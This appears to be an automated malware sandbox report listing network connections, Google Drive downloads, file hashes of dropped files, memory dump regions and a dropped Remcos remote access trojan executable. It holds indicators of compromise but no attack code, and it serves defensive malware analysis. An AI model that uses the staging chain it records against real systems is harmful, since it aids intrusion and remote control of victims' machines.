US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 659c18e898f59254a1e6897d30236de7
SHA1 30d24de8f04d19e6fdcdbd8b389dcc79d796bcb0
SHA256 1640aba3d49d0f45a3e972584cf392ff9ba6bec961b766850a66c050f0c8b01f
SHA512 691097262bc123690c764b01b27e229dd51a0b10f6d2f66c0e4602e1e729771fc83b2b2e2fa0391a92840bae6643c6c610b7344e19b008a4e143de8db2e040e5

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 a449bccc1040fcefa26287ea0637c59c
SHA1 ddff02f5f386f0a803009d83850f72cb749a7740
SHA256 8524b99e893abe641b2075501c5ef0bb89dac1da870147e3760963471afebc8f
SHA512 b81a2c57c7d18748e3585ca24d463d68e277f7427f0e0edcad9cdab05a93abea390fa875333cfaf0c5af3a7972286c774275b90d817b358a95205bad57da64b8

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 7b91f74a0398714b29cd3bb05bdb93b0
SHA1 9e8849077dbba422c44dc7509e642a94b576a058
SHA256 17ae8e22661a78edec255aa8001bda6d7d566d0cbb1f03fb3415cec07c0e0f89
SHA512 dd7fbbb86deee011c36e2b8e96468d481d43f5e3f8e689b7c5964ed65a27038fd748cb75531fb741f16496ac2dbc288664544670a10a924b96b15cfab468e86a

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 b6d471fb9f599ef683b89340f6e64222
SHA1 f21ebcf9e9c605767a3bdef79afa261f066a7d4a
SHA256 1057f68b86350cff16aff7d139069cc262348befbd6f23c871c7750732f04b70
SHA512 57e5fe14bb34f41889501f737fda575d9331851db62ee55ba246f615a651e0489477c3eff9f147b3afc3badffb2da218e3d8bc1efce2415f1039ce6ac0246f8e

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 cdf6e3f93ff1f7a5219f3b633a7a54f0
SHA1 8603e4d550939dee4c99e176d702e4ad307d0011
SHA256 7d22a4cea6653562a55fe98a7f36a99630a421c582c97c6875a3a56b57fc14f9
SHA512 111ef06ccd59d727441995aa4c4f45e3b40e1a76c6ed36e4ecc0866a8a3947b2f7140af776415458b46c24e8ff555b3a10cbe9809e3de5dec2093ffd6db54ad3

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 f57eb09d623441aaeb36473781bc9648
SHA1 27d4b793d26ffe6f1456d7feb721dc9f22f8c020
SHA256 3af281b9188f3af1d4ad7e3e1a814cd4713058e4a2fcf834bacb7f5ad86954c5
SHA512 350a5a48b18cf66134dbe0cdfb023cc42add44813919bf27c0623f9da0b24a04f1efc2e6b37113c9aaefb896a5985b9fed519d9a59800f09aa2878cc86baa8cc

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 22e79aa7aa0322451169b0f596317371
SHA1 fffac880e9b0924315671291d729587dd489e753
SHA256 26c664aac237da4c835aed3fe7c42924cf7321a05b1c2fc867ae85d05311345d
SHA512 3a1a864cb569e6fc6253c00970838fb8ba2eb6f7d73ec359b41314c1bed7db1ee523203b099f451d805cad94da8381364b50cbc4dd34183b81197b62ffd4e699

memory/2320-258-0x000001A8CBAE0000-0x000001A8CBB72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ba2szg4.xm2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2320-268-0x000001A8CBA40000-0x000001A8CBA62000-memory.dmp

memory/2320-269-0x000001A8B1400000-0x000001A8B1410000-memory.dmp

memory/2320-270-0x00007FF973B30000-0x00007FF9745F1000-memory.dmp

memory/2320-271-0x000001A8AFB30000-0x000001A8AFB40000-memory.dmp

memory/2320-272-0x000001A8AFB30000-0x000001A8AFB40000-memory.dmp

memory/2320-273-0x000001A8CBD90000-0x000001A8CBE9E000-memory.dmp

memory/2320-274-0x000001A8B1550000-0x000001A8B1576000-memory.dmp

memory/2320-275-0x000001A8CBCD0000-0x000001A8CBCE4000-memory.dmp

memory/2320-276-0x000001A8CBCF0000-0x000001A8CBCF8000-memory.dmp

memory/4732-277-0x0000000074DE0000-0x0000000075590000-memory.dmp

memory/4732-279-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4732-278-0x00000000053C0000-0x00000000053F6000-memory.dmp

memory/2320-280-0x00007FF973B30000-0x00007FF9745F1000-memory.dmp

memory/4732-281-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4732-282-0x0000000005B30000-0x0000000006158000-memory.dmp

memory/4732-283-0x00000000059C0000-0x0000000005A52000-memory.dmp

memory/4732-284-0x0000000005A60000-0x0000000005A82000-memory.dmp

memory/4732-285-0x0000000006260000-0x00000000062C6000-memory.dmp

memory/4732-286-0x00000000062D0000-0x0000000006336000-memory.dmp

memory/4732-296-0x00000000063E0000-0x0000000006734000-memory.dmp

memory/4732-297-0x0000000006880000-0x0000000006890000-memory.dmp

memory/4732-298-0x00000000069E0000-0x0000000006AEE000-memory.dmp

memory/4732-299-0x0000000006B60000-0x0000000006B7E000-memory.dmp

memory/4732-300-0x0000000006B90000-0x0000000006BDC000-memory.dmp

memory/2320-301-0x000001A8AFB30000-0x000001A8AFB40000-memory.dmp

memory/4732-302-0x00000000083C0000-0x0000000008A3A000-memory.dmp

memory/4732-303-0x0000000007140000-0x000000000715A000-memory.dmp

memory/4732-304-0x0000000007DE0000-0x0000000007E76000-memory.dmp

memory/4732-305-0x0000000007D90000-0x0000000007DB2000-memory.dmp

memory/4732-306-0x0000000008FF0000-0x0000000009594000-memory.dmp

memory/4732-307-0x0000000007FA0000-0x0000000007FC2000-memory.dmp

memory/4732-308-0x0000000008000000-0x0000000008014000-memory.dmp

memory/2320-309-0x000001A8AFB30000-0x000001A8AFB40000-memory.dmp

memory/4732-310-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4732-311-0x0000000008250000-0x0000000008251000-memory.dmp

memory/4732-312-0x00000000095A0000-0x000000000C85B000-memory.dmp

memory/4732-313-0x00000000095A0000-0x000000000C85B000-memory.dmp

memory/4732-315-0x0000000074DE0000-0x0000000075590000-memory.dmp

memory/4732-316-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4732-317-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4732-318-0x0000000077801000-0x0000000077921000-memory.dmp

memory/4732-319-0x00000000054F0000-0x0000000005500000-memory.dmp

memory/4280-320-0x0000000002660000-0x000000000591B000-memory.dmp

memory/4732-321-0x00000000095A0000-0x000000000C85B000-memory.dmp

memory/4280-322-0x0000000077888000-0x0000000077889000-memory.dmp

memory/4280-323-0x0000000077801000-0x0000000077921000-memory.dmp

memory/4280-339-0x0000000077801000-0x0000000077921000-memory.dmp

C:\ProgramData\Remcos\remcos.exe

MD5 251e51e2fedce8bb82763d39d631ef89
SHA1 677a3566789d4da5459a1ecd01a297c261a133a2
SHA256 2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9
SHA512 3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

memory/4280-336-0x0000000002660000-0x000000000591B000-memory.dmp

memory/4280-388-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-390-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4732-389-0x0000000074DE0000-0x0000000075590000-memory.dmp

memory/4280-391-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-402-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4732-403-0x00000000095A0000-0x000000000C85B000-memory.dmp

memory/4280-404-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-400-0x0000000002660000-0x000000000591B000-memory.dmp

memory/4280-405-0x0000000001400000-0x0000000002654000-memory.dmp

memory/2320-409-0x00007FF973B30000-0x00007FF9745F1000-memory.dmp

memory/4280-410-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-411-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-412-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-413-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-415-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-416-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-417-0x0000000001400000-0x0000000002654000-memory.dmp

memory/4280-418-0x0000000001400000-0x0000000002654000-memory.dmp

memory/2800-522-0x0000020897240000-0x0000020897250000-memory.dmp

memory/2800-538-0x000002089F570000-0x000002089F571000-memory.dmp

memory/2800-540-0x000002089F5C0000-0x000002089F5C1000-memory.dmp

memory/2800-541-0x000002089F5C0000-0x000002089F5C1000-memory.dmp

memory/2800-542-0x000002089F6D0000-0x000002089F6D1000-memory.dmp

memory/2800-543-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-544-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-545-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-546-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-547-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-548-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-549-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-550-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-551-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-552-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-553-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-554-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-555-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-556-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-557-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-558-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-559-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-560-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-561-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-562-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-563-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-564-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-565-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-566-0x000002089F5D0000-0x000002089F5D1000-memory.dmp

memory/2800-567-0x000002089F5D0000-0x000002089F5D1000-memory.dmp